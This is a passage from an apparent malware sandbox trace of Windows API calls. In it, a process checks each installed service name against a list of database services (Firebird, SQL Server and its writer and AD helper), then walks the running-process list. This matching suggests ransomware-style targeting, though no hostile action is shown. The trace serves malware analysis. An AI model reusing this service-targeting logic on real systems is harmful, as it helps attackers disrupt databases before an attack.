lpString2="DusmSvc") returned 1 [0305.613] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0305.613] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0305.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0305.614] lstrlenW (lpString="EventLog") returned 8 [0305.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0305.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0305.614] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0305.614] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0305.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0305.614] lstrlenW (lpString="EventSystem") returned 11 [0305.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0305.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0305.614] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0305.614] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0305.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0305.614] lstrlenW (lpString="FontCache") returned 9 [0305.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0305.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0305.614] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0305.614] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0305.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0305.614] lstrlenW (lpString="gpsvc") returned 5 [0305.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0305.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0305.614] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0305.614] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0305.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0305.614] lstrlenW (lpString="iphlpsvc") returned 8 [0305.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0305.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0305.615] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0305.615] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0305.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0305.615] lstrlenW (lpString="KeyIso") returned 6 [0305.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0305.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0305.615] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0305.615] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0305.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0305.615] lstrlenW (lpString="LanmanServer") returned 12 [0305.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0305.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0305.615] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0305.615] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0305.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0305.615] lstrlenW (lpString="LanmanWorkstation") returned 17 [0305.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0305.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0305.615] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0305.615] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0305.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0305.615] lstrlenW (lpString="lfsvc") returned 5 [0305.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0305.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0305.616] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0305.616] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0305.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0305.616] lstrlenW (lpString="lmhosts") returned 7 [0305.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0305.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0305.616] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0305.616] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0305.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0305.616] lstrlenW (lpString="LSM") returned 3 [0305.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0305.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0305.616] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0305.616] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0305.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0305.616] lstrlenW (lpString="MpsSvc") returned 6 [0305.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0305.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0305.616] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0305.616] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0305.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0305.616] lstrlenW (lpString="NcbService") returned 10 [0305.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0305.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0305.616] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0305.616] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0305.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0305.617] lstrlenW (lpString="netprofm") returned 8 [0305.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0305.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0305.617] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0305.617] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0305.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0305.617] lstrlenW (lpString="NgcSvc") returned 6 [0305.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0305.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0305.617] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0305.617] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0305.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0305.617] lstrlenW (lpString="NlaSvc") returned 6 [0305.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0305.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0305.617] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0305.617] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0305.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0305.617] lstrlenW (lpString="nsi") returned 3 [0305.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0305.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0305.617] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0305.617] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0305.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0305.617] lstrlenW (lpString="PcaSvc") returned 6 [0305.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0305.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0305.618] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0305.618] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0305.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0305.618] lstrlenW (lpString="PlugPlay") returned 8 [0305.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0305.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0305.618] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0305.618] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0305.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0305.618] lstrlenW (lpString="Power") returned 5 [0305.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0305.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0305.618] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0305.618] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0305.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0305.618] lstrlenW (lpString="ProfSvc") returned 7 [0305.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0305.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0305.618] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0305.618] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0305.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0305.618] lstrlenW (lpString="RpcEptMapper") returned 12 [0305.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0305.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0305.619] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0305.619] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0305.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0305.619] lstrlenW (lpString="RpcSs") returned 5 [0305.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0305.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0305.619] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0305.619] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0305.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0305.619] lstrlenW (lpString="SamSs") returned 5 [0305.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0305.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0305.619] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0305.619] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0305.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0305.619] lstrlenW (lpString="Schedule") returned 8 [0305.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0305.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0305.619] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0305.619] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0305.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0305.619] lstrlenW (lpString="SecurityHealthService") returned 21 [0305.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0305.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0305.619] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0305.619] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0305.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0305.620] lstrlenW (lpString="SENS") returned 4 [0305.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0305.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0305.620] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0305.620] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0305.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0305.620] lstrlenW (lpString="ShellHWDetection") returned 16 [0305.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0305.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0305.620] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0305.620] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0305.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0305.620] lstrlenW (lpString="Spooler") returned 7 [0305.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0305.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0305.620] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0305.620] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0305.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0305.620] lstrlenW (lpString="StateRepository") returned 15 [0305.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0305.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0305.620] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0305.620] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0305.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0305.620] lstrlenW (lpString="SysMain") returned 7 [0305.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0305.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0305.621] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0305.621] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0305.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0305.621] lstrlenW (lpString="SystemEventsBroker") returned 18 [0305.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0305.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0305.621] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0305.621] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0305.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0305.621] lstrlenW (lpString="Themes") returned 6 [0305.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0305.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0305.621] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0305.621] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0305.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0305.621] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0305.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0305.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0305.621] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0305.621] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0305.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0305.621] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0305.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0305.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0305.622] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0305.622] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0305.794] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4150d60 | out: hHeap=0x470000) returned 1 [0305.794] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x470 [0305.803] Process32FirstW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.803] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0305.804] lstrlenW (lpString="System") returned 6 [0305.804] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0305.805] lstrlenW (lpString="smss.exe") returned 8 [0305.805] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0305.806] lstrlenW (lpString="csrss.exe") returned 9 [0305.806] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0305.806] lstrlenW (lpString="wininit.exe") returned 11 [0305.806] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0305.807] lstrlenW (lpString="csrss.exe") returned 9 [0305.807] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0305.808] lstrlenW (lpString="winlogon.exe") returned 12 [0305.808] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0305.809] lstrlenW (lpString="services.exe") returned 12 [0305.809] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0305.810] lstrlenW (lpString="lsass.exe") returned 9 [0305.810] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0305.811] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0305.811] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0305.811] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0305.812] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.812] lstrlenW (lpString="svchost.exe") returned 11 [0305.812] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.813] lstrlenW (lpString="svchost.exe") returned 11 [0305.813] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0305.813] lstrlenW (lpString="dwm.exe") returned 7 [0305.813] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.814] lstrlenW (lpString="svchost.exe") returned 11 [0305.814] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.815] lstrlenW (lpString="svchost.exe") returned 11 [0305.815] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.815] lstrlenW (lpString="svchost.exe") returned 11 [0305.815] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.816] lstrlenW (lpString="svchost.exe") returned 11 [0305.816] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.817] lstrlenW (lpString="svchost.exe") returned 11 [0305.817] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.817] lstrlenW (lpString="svchost.exe") returned 11 [0305.817] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.818] lstrlenW (lpString="svchost.exe") returned 11 [0305.818] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.819] lstrlenW (lpString="svchost.exe") returned 11 [0305.819] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.819] lstrlenW (lpString="svchost.exe") returned 11 [0305.819] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.820] lstrlenW (lpString="svchost.exe") returned 11 [0305.820] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0305.821] lstrlenW (lpString="spoolsv.exe") returned 11 [0305.821] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.821] lstrlenW (lpString="svchost.exe") returned 11 [0305.821] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, 